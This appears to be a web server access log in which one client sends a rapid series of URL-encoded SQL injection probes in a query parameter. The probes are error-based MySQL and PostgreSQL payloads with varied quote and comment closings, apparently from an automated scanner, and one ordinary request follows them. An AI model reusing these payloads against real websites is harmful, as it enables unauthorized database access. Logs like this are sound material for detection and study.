93.99.104.117 - - [06/Apr/2020:11:54:28 +0200] "POST /10227785?dir=ASC&mode=grid&order=name&limit=15%20AND%20%28SELECT%201257%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162706b71%2C%28SELECT%20%28ELT%281257%3D1257%2C1%29%29%29%2C0x716a6b7671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29--%20YahC&page=1 HTTP/1.1" 200 4084 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:54:30 +0200] "POST /10227785?dir=ASC&mode=grid&order=name&limit=15%27%29%20AND%20%28SELECT%201257%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162706b71%2C%28SELECT%20%28ELT%281257%3D1257%2C1%29%29%29%2C0x716a6b7671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%28%27kXtF%27%3D%27kXtF&page=1 HTTP/1.1" 200 4110 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:54:33 +0200] "POST /10227785?dir=ASC&mode=grid&order=name&limit=15%27%20AND%20%28SELECT%201257%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162706b71%2C%28SELECT%20%28ELT%281257%3D1257%2C1%29%29%29%2C0x716a6b7671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27egYO%27%3D%27egYO&page=1 HTTP/1.1" 200 4106 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:54:36 +0200] "POST /10227785?dir=ASC&mode=grid&order=name&limit=15%25%27%20AND%20%28SELECT%201257%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162706b71%2C%28SELECT%20%28ELT%281257%3D1257%2C1%29%29%29%2C0x716a6b7671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27&page=1 HTTP/1.1" 200 4102 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:54:38 +0200] "POST /10227785?dir=ASC&mode=grid&order=name&limit=15%29%20AND%201542%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281542%3D1542%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%286763%3D6763&page=1 HTTP/1.1" 200 4119 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:54:41 +0200] "POST /10227785?dir=ASC&mode=grid&order=name&limit=15%20AND%201542%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281542%3D1542%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29&page=1 HTTP/1.1" 200 4095 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:54:43 +0200] "POST /10227785?dir=ASC&mode=grid&order=name&limit=15%20AND%201542%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281542%3D1542%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20msVP&page=1 HTTP/1.1" 200 4105 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:54:46 +0200] "POST /10227785?dir=ASC&mode=grid&order=name&limit=15%27%29%20AND%201542%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281542%3D1542%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27cdfu%27%3D%27cdfu&page=1 HTTP/1.1" 200 4131 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
193.194.132.27 - - [06/Apr/2020:11:54:48 +0200] "GET /reload?ser=1586166887475 HTTP/1.1" 200 28 "http://renault.2web.at/result?searchterm=true&search=REH5447" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
